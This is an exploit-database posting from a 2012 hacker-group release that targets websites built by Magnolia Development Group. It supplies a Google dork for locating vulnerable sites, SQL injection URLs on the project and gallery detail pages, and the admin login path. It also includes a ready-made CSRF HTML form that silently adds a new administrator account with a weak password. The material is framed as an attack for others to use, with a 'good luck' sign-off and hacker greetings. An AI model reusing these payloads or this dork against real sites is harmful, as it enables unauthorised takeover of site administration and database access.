1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm kalashinkov3 member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] Info================================================================
[-] Title : Magnolia Development Group Multiple SQL-i/CSRF Vulnerability
[-] Author: Kalashinkov3
[-] Home : ALGERIA / 13000
[-] Website : 1337day.com
[-] Facebook : facebook.com/Algerian.Cyber.Army
[-] Vendor: magdevgroup.com
[-] Email : kalashinkov3[at]Hotmail[dot]Fr
[-] Date : 06/05/2012
[-] Google Dork : intext:"site by magnolia development group"
[-] Security Risk : High
[-] Category : webapps / 0day / SQL-i / CSRF
[+] Exploit===============================================================
[-] SQL-i :)
# http://[localhost]/project_detail.php?id='1
# http://[localhost]/project_detail.php?id=[SQLi]
# http://[localhost]/gallery_detail.php?id='1
# http://[localhost]/gallery_detail.php?id=[SQLi]
# http://[localhost]/*.php?*='1
# http://[localhost]/*.php?*=[SQLi]
[-] Admin Login
# http://[localhost]/admin
[-] CSRF -> Add New admin
<html>
<script language="javascript">
function Publish()
{
document.formlist.action.value="publish";
document.formlist.submit();
}
function Unpublish()
{
document.formlist.action.value="unpublish";
document.formlist.submit();
}
function Delete()
{
document.formlist.action.value="delete";
document.formlist.submit();
}
</script>
</head>
<form action="http://site.com/admin/user_act.php" method="post" name="formdetail" id="formdetail">
<input type="hidden" name="user_id" value="" />
<input type="hidden" name="action" value="addnew" />
<table border="0" align="center" cellpadding="3" cellspacing="0">
<input name="user_name" type="text" id="user_name" value="admin"/>
<input name="user_pwd" type="text" id="user_pwd" value="123456"/>
<input name="user_email" type="text" id="user_email" value="admin@admin"/>
<input type="submit" name="Submit" value="SAVE"/>
<html>
^_^ G00d LUCK ALL :=)
[+] Greets===================================================================+
+
KedAns-Dz, Caddy-Dz, KnocKout, Rizky Ariestiyansyah, Algerian.Cyber.Army +
Keinji1258, 1337day.com, packetstormsecurity.org, Exploit-id.com, Over-x +
andhrahackers.com, 1337day.com/team, id-backtrack.com, dofus-exploit.com +
all Algerians Hacker'S ;), All My Friends +
[ I Love You Lily Far ] +
+
=============================================================================+